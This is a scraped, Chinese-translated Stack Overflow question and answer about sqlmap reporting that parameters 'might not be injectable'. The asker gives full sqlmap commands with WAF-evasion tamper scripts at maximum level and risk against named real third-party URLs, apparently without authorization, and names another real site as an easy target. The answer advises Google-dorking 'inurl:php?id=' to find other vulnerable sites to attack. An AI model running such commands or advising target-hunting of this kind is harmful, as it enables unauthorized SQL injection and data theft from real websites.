Sqlmap 参数“可能无法注入”

Posted

技术标签:

【中文标题】Sqlmap 参数“可能无法注入”【英文标题】:Sqlmap parameter "might not be injectable" 【发布时间】:2015-10-06 18:38:51 【问题描述】:

我从 sqlmap 开始,我有以下疑问: 当我尝试使用这个 sn-p 使用 sqlmap(试图绕过 waf)时:

sqlmap.py -u "http://prefing.umsa.edu.bo/index.php?option=com_newsfeeds&view=newsfeed&id=1&feedid=1&Itemid=18" --dbs --dbms=mysql --time-sec=10 --hex --level=5 --risk=3 --tamper=apostrophemask,apostrophenullencode,appendnullbyte,base64encode,between,bluecoat,chardoubleencode,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,randomcomments,securesphere,space2comment,space2dash,space2hash,space2morehash,space2mssqlblank,space2mssqlhash,space2mysqlblank,space2mysqldash,space2plus,space2randomblank,sp_password,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords

或者这个:

sqlmap.py -u "http://prefing.umsa.edu.bo/index.php?view=article&catid=35:pagina-principal&id=44:inicio-central&format=pdf" --dbs --dbms=mysql --time-sec=10 --hex --string --regexp --level=5 --risk=3 --tamper=apostrophemask,apostrophenullencode,appendnullbyte,base64encode,between,bluecoat,chardoubleencode,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,randomcomments,securesphere,space2comment,space2dash,space2hash,space2morehash,space2mssqlblank,space2mssqlhash,space2mysqlblank,space2mysqldash,space2plus,space2randomblank,sp_password,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords

我看到控制台中出现了:

[WARNING] 启发式(基本)测试表明 GET 参数 'option' 可能不可注入 [警告] 启发式(基本)测试表明 GET 参数“视图”可能无法注入

还试图在我的网站内找到一个类似于:http://www.cafe53rd.com/menu.php?item_id=3 的网址 因为我检查了这种 url 最容易访问,但我无法在我正在审核的网站上找到它。

在下面的Site ("http://prefing...")中正确的代码是什么

对不起,我的英语不好。 非常感谢。

【问题讨论】:

【参考方案1】:

这个错误只是表明正在执行的注射技术类型没有给出积极的响应。 我已经面对它并通过获取备用链接解决了它。 我建议找到一些其他易受攻击的链接,使用搜索 inurl:php?id= 然后在 sqlmap 中插入链接。

【讨论】:

以上是关于Sqlmap 参数“可能无法注入”的主要内容,如果未能解决你的问题,请参考以下文章

SQLMAP注入json格式数据

Burpsuite Sqlmap Nmap入门总结

sqlmap通过soap主体中的参数注入?

sqlmap工具之参数使用

Sqlmap中代理及其他常用参数

sqlmap怎么注入sql server